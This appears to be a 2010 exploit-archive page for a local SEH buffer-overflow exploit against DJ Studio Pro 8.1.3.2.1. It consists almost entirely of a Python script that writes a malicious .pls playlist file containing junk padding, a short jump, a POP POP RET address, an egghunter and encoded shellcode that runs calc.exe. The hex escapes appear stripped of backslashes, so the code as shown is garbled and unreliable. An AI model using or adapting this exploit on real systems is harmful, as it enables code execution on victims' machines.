[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : DJ Studio Pro Version 8.1.3.2.1 SEH Exploit
# Published : 2010-09-17
# Author : Abhishek Lyall
# Previous Title : A-PDF All to MP3 Converter v.1.1.0 Universal Local SEH Exploit
# Next Title : BACnet OPC Client Buffer Overflow Exploit
#DJ Studio Pro Version 8.1.3.2.1 SEH 0 day
#Author Abhishek Lyall - abhilyall[at]gmail[dot]com, info[at]aslitsecurity[dot]com
#Web - http://www.aslitsecurity.com/
#Blog - http://www.aslitsecurity.blogspot.com/
#Download Vulnerable application from http://www.e-soft.co.uk/DJSP.htm
#Vulnerable version DJ Studio Pro Version 8.1.3.2.1
#Tested on XP SP2
#Greets Villy, Puneet Jain, Abhishek Sahni and ASL IT SECURITY TEAM
#!/usr/bin/python
filename = "ASL.pls"
#windows/exec - CMD=calc.exe
shellcode = (
"x41x42x48x49x41x42x48x49" #Egg Hunted
"xDBxDFxD9x74x24xF4x58x2BxC9xB1x33xBA"
"x4CxA8x75x76x83xC0x04x31x50x13x03x1CxBBx97x83x60"
"x53xDEx6Cx98xA4x81xE5x7Dx95x93x92xF6x84x23xD0x5A"
"x25xCFxB4x4ExBExBDx10x61x77x0Bx47x4Cx88xBDx47x02"
"x4AxDFx3Bx58x9Fx3Fx05x93xD2x3Ex42xC9x1Dx12x1Bx86"
"x8Cx83x28xDAx0CxA5xFEx51x2CxDDx7BxA5xD9x57x85xF5"
"x72xE3xCDxEDxF9xABxEDx0Cx2DxA8xD2x47x5Ax1BxA0x56"
"x8Ax55x49x69xF2x3Ax74x46xFFx43xB0x60xE0x31xCAx93"
"x9Dx41x09xEEx79xC7x8Cx48x09x7Fx75x69xDExE6xFEx65"
"xABx6Dx58x69x2AxA1xD2x95xA7x44x35x1CxF3x62x91x45"
"xA7x0Bx80x23x06x33xD2x8BxF7x91x98x39xE3xA0xC2x57"
"xF2x21x79x1ExF4x39x82x30x9Dx08x09xDFxDAx94xD8xA4"
"x05x77xC9xD0xADx2Ex98x59xB0xD0x76x9DxCDx52x73x5D"
"x2Ax4AxF6x58x76xCCxEAx10xE7xB9x0Cx87x08xE8x6Ex46"
"x9Bx70x5FxEDx1Bx12x9F"
)
egghunter = (
"x66x81xCAxFFx0Fx42x52x6Ax02x58xCDx2Ex3Cx05x5Ax74xEFxB8"
"x41x42x48x49" # Egghunter tag "ABHIABHI" Greets http://www.corelan.be:8800
"x8BxFAxAFx75xEAxAFx75xE7xFFxE7"
)
head = "x5Bx70x6Cx61x79x6Cx69x73x74x5Dx0Dx0Ax46x69x6Cx65x31x3D"
junk = "x41" * 1940
nseh = "xebx06x90x90" # Short Jump
seh = "xcbx75x52x73" # POP POP RET 0x735275CB msvbvm60.dll
nop = "x90" * 12 # NOP Sled
padd = "x90" *(5000-len(junk+nseh+seh+nop+shellcode))
textfile = open(filename , 'w')
textfile.write(head+junk+nseh+seh+nop+egghunter+padd+shellcode)
textfile.close()